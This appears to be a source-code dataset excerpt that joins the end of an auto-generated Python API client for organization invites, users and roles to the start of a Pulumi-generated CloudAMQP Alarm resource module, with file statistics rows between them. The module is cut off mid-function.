def get_invite_by_code_api_v1_organizations_invite_code_get(self, code, **kwargs): # noqa: E501
"""Get Invite By Code # noqa: E501
Gets specific invite. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_invite_by_code_api_v1_organizations_invite_code_get(code, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str code: (required)
:return: Invite
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_invite_by_code_api_v1_organizations_invite_code_get_with_http_info(code, **kwargs) # noqa: E501
else:
(data) = self.get_invite_by_code_api_v1_organizations_invite_code_get_with_http_info(code, **kwargs) # noqa: E501
return data
def get_invite_by_code_api_v1_organizations_invite_code_get_with_http_info(self, code, **kwargs): # noqa: E501
"""Get Invite By Code # noqa: E501
Gets specific invite. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_invite_by_code_api_v1_organizations_invite_code_get_with_http_info(code, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str code: (required)
:return: Invite
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['code'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_invite_by_code_api_v1_organizations_invite_code_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'code' is set
if ('code' not in params or
params['code'] is None):
raise ValueError("Missing the required parameter `code` when calling `get_invite_by_code_api_v1_organizations_invite_code_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'code' in params:
path_params['code'] = params['code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/organizations/invite/{code}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Invite', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_invites_api_v1_organizations_invite_get(self, **kwargs): # noqa: E501
"""Get Invites # noqa: E501
Gets all invites of this users organization. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_invites_api_v1_organizations_invite_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str status:
:return: list[Invite]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_invites_api_v1_organizations_invite_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_invites_api_v1_organizations_invite_get_with_http_info(**kwargs) # noqa: E501
return data
def get_invites_api_v1_organizations_invite_get_with_http_info(self, **kwargs): # noqa: E501
"""Get Invites # noqa: E501
Gets all invites of this users organization. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_invites_api_v1_organizations_invite_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str status:
:return: list[Invite]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['status'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_invites_api_v1_organizations_invite_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'status' in params:
query_params.append(('status', params['status'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/organizations/invite', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Invite]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_loggedin_organization_api_v1_organizations_get(self, **kwargs): # noqa: E501
"""Get Loggedin Organization # noqa: E501
Gets the logged in users organization details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_loggedin_organization_api_v1_organizations_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Organization
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_loggedin_organization_api_v1_organizations_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_loggedin_organization_api_v1_organizations_get_with_http_info(**kwargs) # noqa: E501
return data
def get_loggedin_organization_api_v1_organizations_get_with_http_info(self, **kwargs): # noqa: E501
"""Get Loggedin Organization # noqa: E501
Gets the logged in users organization details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_loggedin_organization_api_v1_organizations_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Organization
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_loggedin_organization_api_v1_organizations_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/organizations/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Organization', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_org_creator_api_v1_organizations_creator_get(self, **kwargs): # noqa: E501
"""Get Org Creator # noqa: E501
Gets all invites of this users organization. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_org_creator_api_v1_organizations_creator_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: User
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_org_creator_api_v1_organizations_creator_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_org_creator_api_v1_organizations_creator_get_with_http_info(**kwargs) # noqa: E501
return data
def get_org_creator_api_v1_organizations_creator_get_with_http_info(self, **kwargs): # noqa: E501
"""Get Org Creator # noqa: E501
Gets all invites of this users organization. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_org_creator_api_v1_organizations_creator_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: User
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_org_creator_api_v1_organizations_creator_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/organizations/creator', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='User', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_org_users_api_v1_organizations_users_get(self, **kwargs): # noqa: E501
"""Get Org Users # noqa: E501
Gets a list of all users in an organization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_org_users_api_v1_organizations_users_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[UserInOrganization]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_org_users_api_v1_organizations_users_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_org_users_api_v1_organizations_users_get_with_http_info(**kwargs) # noqa: E501
return data
def get_org_users_api_v1_organizations_users_get_with_http_info(self, **kwargs): # noqa: E501
"""Get Org Users # noqa: E501
Gets a list of all users in an organization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_org_users_api_v1_organizations_users_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[UserInOrganization]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_org_users_api_v1_organizations_users_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/organizations/users', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[UserInOrganization]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_roles_in_org_api_v1_organizations_roles_get(self, **kwargs): # noqa: E501
"""Get Roles In Org # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_roles_in_org_api_v1_organizations_roles_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_roles_in_org_api_v1_organizations_roles_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_roles_in_org_api_v1_organizations_roles_get_with_http_info(**kwargs) # noqa: E501
return data
def get_roles_in_org_api_v1_organizations_roles_get_with_http_info(self, **kwargs): # noqa: E501
"""Get Roles In Org # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_roles_in_org_api_v1_organizations_roles_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_roles_in_org_api_v1_organizations_roles_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/organizations/roles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 38.98603
| 162
| 0.623936
| 3,892
| 33,489
| 5.043422
| 0.045992
| 0.048092
| 0.069693
| 0.033012
| 0.965663
| 0.960925
| 0.956748
| 0.93693
| 0.922971
| 0.911305
| 0
| 0.018805
| 0.291797
| 33,489
| 858
| 163
| 39.031469
| 0.808829
| 0.313566
| 0
| 0.79476
| 1
| 0
| 0.176382
| 0.071816
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041485
| false
| 0.015284
| 0.008734
| 0
| 0.111354
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12ac0d4607110dc4ee2bf185eaf5c98c95999b44
| 26,459
|
py
|
Python
|
sdk/python/pulumi_cloudamqp/alarm.py
|
pulumi/pulumi-cloudamqp
|
1d411fb0076c257b51a6b133aaedb9292efa2373
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-09-23T11:53:33.000Z
|
2021-12-01T20:56:35.000Z
|
sdk/python/pulumi_cloudamqp/alarm.py
|
pulumi/pulumi-cloudamqp
|
1d411fb0076c257b51a6b133aaedb9292efa2373
|
[
"ECL-2.0",
"Apache-2.0"
] | 53
|
2019-12-09T20:12:27.000Z
|
2022-03-31T15:21:00.000Z
|
sdk/python/pulumi_cloudamqp/alarm.py
|
pulumi/pulumi-cloudamqp
|
1d411fb0076c257b51a6b133aaedb9292efa2373
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-12-11T09:29:16.000Z
|
2019-12-11T09:29:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['AlarmArgs', 'Alarm']
@pulumi.input_type
class AlarmArgs:
def __init__(__self__, *,
enabled: pulumi.Input[bool],
instance_id: pulumi.Input[int],
recipients: pulumi.Input[Sequence[pulumi.Input[int]]],
type: pulumi.Input[str],
message_type: Optional[pulumi.Input[str]] = None,
queue_regex: Optional[pulumi.Input[str]] = None,
time_threshold: Optional[pulumi.Input[int]] = None,
value_threshold: Optional[pulumi.Input[int]] = None,
vhost_regex: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Alarm resource.
:param pulumi.Input[bool] enabled: Enable or disable the alarm to trigger.
:param pulumi.Input[int] instance_id: The CloudAMQP instance ID.
:param pulumi.Input[Sequence[pulumi.Input[int]]] recipients: Identifier for recipient to be notified. Leave empty to notify all recipients.
:param pulumi.Input[str] type: The alarm type, see valid options below.
:param pulumi.Input[str] message_type: Message type `(total, unacked, ready)` used by queue alarm type.
:param pulumi.Input[str] queue_regex: Regex for which queue to check.
:param pulumi.Input[int] time_threshold: The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
:param pulumi.Input[int] value_threshold: The value to trigger the alarm for.
:param pulumi.Input[str] vhost_regex: Regex for which vhost to check
"""
pulumi.set(__self__, "enabled", enabled)
pulumi.set(__self__, "instance_id", instance_id)
pulumi.set(__self__, "recipients", recipients)
pulumi.set(__self__, "type", type)
if message_type is not None:
pulumi.set(__self__, "message_type", message_type)
if queue_regex is not None:
pulumi.set(__self__, "queue_regex", queue_regex)
if time_threshold is not None:
pulumi.set(__self__, "time_threshold", time_threshold)
if value_threshold is not None:
pulumi.set(__self__, "value_threshold", value_threshold)
if vhost_regex is not None:
pulumi.set(__self__, "vhost_regex", vhost_regex)
@property
@pulumi.getter
def enabled(self) -> pulumi.Input[bool]:
"""
Enable or disable the alarm to trigger.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: pulumi.Input[bool]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Input[int]:
"""
The CloudAMQP instance ID.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: pulumi.Input[int]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter
def recipients(self) -> pulumi.Input[Sequence[pulumi.Input[int]]]:
"""
Identifier for recipient to be notified. Leave empty to notify all recipients.
"""
return pulumi.get(self, "recipients")
@recipients.setter
def recipients(self, value: pulumi.Input[Sequence[pulumi.Input[int]]]):
pulumi.set(self, "recipients", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The alarm type, see valid options below.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="messageType")
def message_type(self) -> Optional[pulumi.Input[str]]:
"""
Message type `(total, unacked, ready)` used by queue alarm type.
"""
return pulumi.get(self, "message_type")
@message_type.setter
def message_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message_type", value)
@property
@pulumi.getter(name="queueRegex")
def queue_regex(self) -> Optional[pulumi.Input[str]]:
"""
Regex for which queue to check.
"""
return pulumi.get(self, "queue_regex")
@queue_regex.setter
def queue_regex(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "queue_regex", value)
@property
@pulumi.getter(name="timeThreshold")
def time_threshold(self) -> Optional[pulumi.Input[int]]:
"""
The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
"""
return pulumi.get(self, "time_threshold")
@time_threshold.setter
def time_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "time_threshold", value)
@property
@pulumi.getter(name="valueThreshold")
def value_threshold(self) -> Optional[pulumi.Input[int]]:
"""
The value to trigger the alarm for.
"""
return pulumi.get(self, "value_threshold")
@value_threshold.setter
def value_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "value_threshold", value)
@property
@pulumi.getter(name="vhostRegex")
def vhost_regex(self) -> Optional[pulumi.Input[str]]:
"""
Regex for which vhost to check
"""
return pulumi.get(self, "vhost_regex")
@vhost_regex.setter
def vhost_regex(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vhost_regex", value)
@pulumi.input_type
class _AlarmState:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
instance_id: Optional[pulumi.Input[int]] = None,
message_type: Optional[pulumi.Input[str]] = None,
queue_regex: Optional[pulumi.Input[str]] = None,
recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
time_threshold: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
value_threshold: Optional[pulumi.Input[int]] = None,
vhost_regex: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Alarm resources.
:param pulumi.Input[bool] enabled: Enable or disable the alarm to trigger.
:param pulumi.Input[int] instance_id: The CloudAMQP instance ID.
:param pulumi.Input[str] message_type: Message type `(total, unacked, ready)` used by queue alarm type.
:param pulumi.Input[str] queue_regex: Regex for which queue to check.
:param pulumi.Input[Sequence[pulumi.Input[int]]] recipients: Identifier for recipient to be notified. Leave empty to notify all recipients.
:param pulumi.Input[int] time_threshold: The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
:param pulumi.Input[str] type: The alarm type, see valid options below.
:param pulumi.Input[int] value_threshold: The value to trigger the alarm for.
:param pulumi.Input[str] vhost_regex: Regex for which vhost to check
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if instance_id is not None:
pulumi.set(__self__, "instance_id", instance_id)
if message_type is not None:
pulumi.set(__self__, "message_type", message_type)
if queue_regex is not None:
pulumi.set(__self__, "queue_regex", queue_regex)
if recipients is not None:
pulumi.set(__self__, "recipients", recipients)
if time_threshold is not None:
pulumi.set(__self__, "time_threshold", time_threshold)
if type is not None:
pulumi.set(__self__, "type", type)
if value_threshold is not None:
pulumi.set(__self__, "value_threshold", value_threshold)
if vhost_regex is not None:
pulumi.set(__self__, "vhost_regex", vhost_regex)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable or disable the alarm to trigger.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> Optional[pulumi.Input[int]]:
"""
The CloudAMQP instance ID.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter(name="messageType")
def message_type(self) -> Optional[pulumi.Input[str]]:
"""
Message type `(total, unacked, ready)` used by queue alarm type.
"""
return pulumi.get(self, "message_type")
@message_type.setter
def message_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message_type", value)
@property
@pulumi.getter(name="queueRegex")
def queue_regex(self) -> Optional[pulumi.Input[str]]:
"""
Regex for which queue to check.
"""
return pulumi.get(self, "queue_regex")
@queue_regex.setter
def queue_regex(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "queue_regex", value)
@property
@pulumi.getter
def recipients(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
"""
Identifier for recipient to be notified. Leave empty to notify all recipients.
"""
return pulumi.get(self, "recipients")
@recipients.setter
def recipients(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
pulumi.set(self, "recipients", value)
@property
@pulumi.getter(name="timeThreshold")
def time_threshold(self) -> Optional[pulumi.Input[int]]:
"""
The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
"""
return pulumi.get(self, "time_threshold")
@time_threshold.setter
def time_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "time_threshold", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The alarm type, see valid options below.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="valueThreshold")
def value_threshold(self) -> Optional[pulumi.Input[int]]:
"""
The value to trigger the alarm for.
"""
return pulumi.get(self, "value_threshold")
@value_threshold.setter
def value_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "value_threshold", value)
@property
@pulumi.getter(name="vhostRegex")
def vhost_regex(self) -> Optional[pulumi.Input[str]]:
"""
Regex for which vhost to check
"""
return pulumi.get(self, "vhost_regex")
@vhost_regex.setter
def vhost_regex(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vhost_regex", value)
class Alarm(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
enabled: Optional[pulumi.Input[bool]] = None,
instance_id: Optional[pulumi.Input[int]] = None,
message_type: Optional[pulumi.Input[str]] = None,
queue_regex: Optional[pulumi.Input[str]] = None,
recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
time_threshold: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
value_threshold: Optional[pulumi.Input[int]] = None,
vhost_regex: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource allows you to create and manage alarms to trigger based on a set of conditions. Once triggerd a notification will be sent to the assigned recipients. When creating a new instance, there will also be a set of default alarms (cpu, memory and disk) created. All default alarms uses the default recipient for notifications.
By setting `no_default_alarms` to *true* in `Instance`. This will create the instance without default alarms and avoid the need to import them to get full control.
Available for all subscription plans, but `lemur`and `tiger`are limited to fewer alarm types. The limited types supported can be seen in the table below in Alarm Type Reference.
## Alarm Type reference
Valid options for notification type.
Required arguments for all alarms: *instance_id*, *type* and *enabled*
Optional argument for all alarms: *tags*, *queue_regex*, *vhost_regex*
| Name | Type | Shared | Dedicated | Required arguments |
| ---- | ---- | ---- | ---- | ---- | ---- |
| CPU | cpu | - | ✔ | time_threshold, value_threshold |
| Memory | memory | - | ✔ | time_threshold, value_threshold |
| Disk space | disk | - | ✔ | time_threshold, value_threshold |
| Queue | queue | ✔ | ✔ | time_threshold, value_threshold, queue_regex, vhost_regex, message_type |
| Connection | connection | ✔ | ✔ | time_threshold, value_threshold |
| Consumer | consumer | ✔ | ✔ | time_threshold, value_threshold, queue, vhost |
| Netsplit | netsplit | - | ✔ | time_threshold |
| Server unreachable | server_unreachable | - | ✔ | time_threshold |
| Notice | notice | ✔ | ✔ | |
## Dependency
This resource depends on CloudAMQP instance identifier, `cloudamqp_instance.instance.id`.
## Import
`cloudamqp_alarm` can be imported using CloudAMQP internal identifier of the alarm together (CSV separated) with the instance identifier. To retrieve the alarm identifier, use [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html#list-alarms)
```sh
$ pulumi import cloudamqp:index/alarm:Alarm alarm <id>,<instance_id>`
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] enabled: Enable or disable the alarm to trigger.
:param pulumi.Input[int] instance_id: The CloudAMQP instance ID.
:param pulumi.Input[str] message_type: Message type `(total, unacked, ready)` used by queue alarm type.
:param pulumi.Input[str] queue_regex: Regex for which queue to check.
:param pulumi.Input[Sequence[pulumi.Input[int]]] recipients: Identifier for recipient to be notified. Leave empty to notify all recipients.
:param pulumi.Input[int] time_threshold: The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
:param pulumi.Input[str] type: The alarm type, see valid options below.
:param pulumi.Input[int] value_threshold: The value to trigger the alarm for.
:param pulumi.Input[str] vhost_regex: Regex for which vhost to check
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AlarmArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource allows you to create and manage alarms to trigger based on a set of conditions. Once triggerd a notification will be sent to the assigned recipients. When creating a new instance, there will also be a set of default alarms (cpu, memory and disk) created. All default alarms uses the default recipient for notifications.
By setting `no_default_alarms` to *true* in `Instance`. This will create the instance without default alarms and avoid the need to import them to get full control.
Available for all subscription plans, but `lemur`and `tiger`are limited to fewer alarm types. The limited types supported can be seen in the table below in Alarm Type Reference.
## Alarm Type reference
Valid options for notification type.
Required arguments for all alarms: *instance_id*, *type* and *enabled*
Optional argument for all alarms: *tags*, *queue_regex*, *vhost_regex*
| Name | Type | Shared | Dedicated | Required arguments |
| ---- | ---- | ---- | ---- | ---- | ---- |
| CPU | cpu | - | ✔ | time_threshold, value_threshold |
| Memory | memory | - | ✔ | time_threshold, value_threshold |
| Disk space | disk | - | ✔ | time_threshold, value_threshold |
| Queue | queue | ✔ | ✔ | time_threshold, value_threshold, queue_regex, vhost_regex, message_type |
| Connection | connection | ✔ | ✔ | time_threshold, value_threshold |
| Consumer | consumer | ✔ | ✔ | time_threshold, value_threshold, queue, vhost |
| Netsplit | netsplit | - | ✔ | time_threshold |
| Server unreachable | server_unreachable | - | ✔ | time_threshold |
| Notice | notice | ✔ | ✔ | |
## Dependency
This resource depends on CloudAMQP instance identifier, `cloudamqp_instance.instance.id`.
## Import
`cloudamqp_alarm` can be imported using CloudAMQP internal identifier of the alarm together (CSV separated) with the instance identifier. To retrieve the alarm identifier, use [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html#list-alarms)
```sh
$ pulumi import cloudamqp:index/alarm:Alarm alarm <id>,<instance_id>`
```
:param str resource_name: The name of the resource.
:param AlarmArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AlarmArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
enabled: Optional[pulumi.Input[bool]] = None,
instance_id: Optional[pulumi.Input[int]] = None,
message_type: Optional[pulumi.Input[str]] = None,
queue_regex: Optional[pulumi.Input[str]] = None,
recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
time_threshold: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
value_threshold: Optional[pulumi.Input[int]] = None,
vhost_regex: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AlarmArgs.__new__(AlarmArgs)
if enabled is None and not opts.urn:
raise TypeError("Missing required property 'enabled'")
__props__.__dict__["enabled"] = enabled
if instance_id is None and not opts.urn:
raise TypeError("Missing required property 'instance_id'")
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["message_type"] = message_type
